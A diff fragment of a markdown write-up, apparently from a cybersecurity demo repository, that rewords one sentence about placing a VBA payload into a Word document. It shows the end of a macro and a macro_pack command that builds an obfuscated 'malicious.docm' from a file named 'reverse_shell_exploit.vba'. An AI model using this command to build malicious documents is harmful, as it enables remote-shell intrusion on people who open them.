EnricoPiccin02/Cybersecurity-Demo/home.md

     Document_Open
 End Sub
 ```
-To inject this payload into a Word document, I used `macro_pack` by executing the following command:
+To embed this payload into a Word document, I used `macro_pack` by executing the following command:
 ```
 macro_pack.exe -f reverse_shell_exploit.vba -o -G malicious.docm
 ```